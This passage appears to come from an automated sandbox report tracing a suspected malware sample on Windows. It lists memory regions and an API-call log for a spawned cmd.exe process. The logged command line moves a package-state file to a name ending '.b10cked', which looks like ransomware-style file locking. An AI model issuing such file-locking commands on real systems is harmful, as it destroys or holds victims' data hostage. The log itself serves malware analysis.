"pagefile_0x0000000000020000" filename = "" Region: id = 30131 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30132 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30133 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 30134 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30135 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30136 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30137 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30138 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30139 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30140 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30141 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30142 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30143 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30144 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30145 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30146 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 30147 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30148 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 689 os_tid = 0xe14 Process: id = "493" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30286 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30287 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30288 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30289 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 30290 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30291 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30292 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30293 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30294 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30295 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30341 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30342 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30343 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30344 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 30345 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 30346 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30347 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30348 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30349 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30350 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30351 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30352 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30353 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30354 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30355 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 30356 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30357 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30358 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30359 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30360 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 30361 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 30362 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 30363 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 30364 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 690 os_tid = 0xf78 [0205.442] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa0c | out: lpSystemTimeAsFileTime=0x24fa0c*(dwLowDateTime=0xaf42bc00, dwHighDateTime=0x1d440a9)) [0205.442] GetCurrentProcessId () returned 0x928 [0205.442] GetCurrentThreadId () returned 0xf78 [0205.442] GetTickCount () returned 0x39dd4 [0205.442] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa04 | out: lpPerformanceCount=0x24fa04*=26223126059) returned 1 [0205.443] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0205.443] __set_app_type (_Type=0x1) [0205.443] __p__fmode () returned 0x76b331f4 [0205.443] __p__commode () returned 0x76b331fc [0205.443] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0205.443] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0205.443] GetCurrentThreadId () returned 0xf78 [0205.443] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf78) returned 0x38 [0205.443] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.443] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0205.443] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.444] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f99c | out: phkResult=0x24f99c*=0x0) returned 0x2 [0205.444] VirtualQuery (in: lpAddress=0x24f9d3, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0205.444] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f96c, dwLength=0x1c | out: lpBuffer=0x24f96c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0205.444] GetConsoleOutputCP () returned 0x1b5 [0205.444] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.444] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.444] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.445] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.445] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.445] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0205.445] GetEnvironmentStringsW () returned 0x400190* [0205.445] FreeEnvironmentStringsW (penv=0x400190) returned 1 [0205.445] GetEnvironmentStringsW () returned 0x400190* [0205.446] FreeEnvironmentStringsW (penv=0x400190) returned 1 [0205.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e90c | out: phkResult=0x24e90c*=0x40) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0xb8, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x0, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegCloseKey (hKey=0x40) returned 0x0 [0205.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e90c | out: phkResult=0x24e90c*=0x40) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x40, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x1, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x0, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x4, lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x4) returned 0x0 [0205.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e914, lpData=0x24e918, lpcbData=0x24e910*=0x1000 | out: lpType=0x24e914*=0x0, lpData=0x24e918*=0x9, lpcbData=0x24e910*=0x1000) returned 0x2 [0205.446] RegCloseKey (hKey=0x40) returned 0x0 [0205.446] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a7 [0205.446] srand (_Seed=0x5b8863a7) [0205.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" [0205.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm.b10cked\"" [0205.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.447] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4018f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0205.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0205.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0205.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.447] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0205.447] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0205.447] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0205.447] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0205.447] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0205.447] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0205.447] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0205.447] GetEnvironmentStringsW () returned 0x4022e0* [0205.447] FreeEnvironmentStringsW (penv=0x4022e0) returned 1 [0205.447] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.448] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0205.448] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0205.448] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0205.448] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0205.448] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0205.448] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0205.448] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0205.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f6d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f6d8, lpFilePart=0x24f6d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f6d4*="Desktop") returned 0x18 [0205.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 [0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 [0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f454 | out: lpFindFileData=0x24f454) returned 0x400020 [0205.448] FindClose (in: hFindFile=0x400020 | out: hFindFile=0x400020) returned 1 [0205.449] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.449] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.449] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.449] GetEnvironmentStringsW () returned 0x402b00* [0205.449] FreeEnvironmentStringsW (penv=0x402b00) returned 1 [0205.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.449] GetConsoleOutputCP () returned 0x1b5 [0205.450] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.450] GetUserDefaultLCID () returned 0x409 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f818, cchData=128 | out: lpLCData="0") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f818, cchData=128 | out: lpLCData="0") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f818, cchData=128 | out: lpLCData="1") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.451] GetConsoleTitleW (in: lpConsoleTitle=0x3f08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.453] _wcsicmp (_String1="move", _String2=")") returned 68 [0205.453] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0205.453] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0205.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0205.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0205.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0205.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0205.457] GetConsoleTitleW (in: lpConsoleTitle=0x24f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.458] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0205.458] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0205.458] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0205.458] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0205.458] _wcsicmp (_String1="move", _String2="CD") returned 10 [0205.458] _wcsicmp (_String1="move", 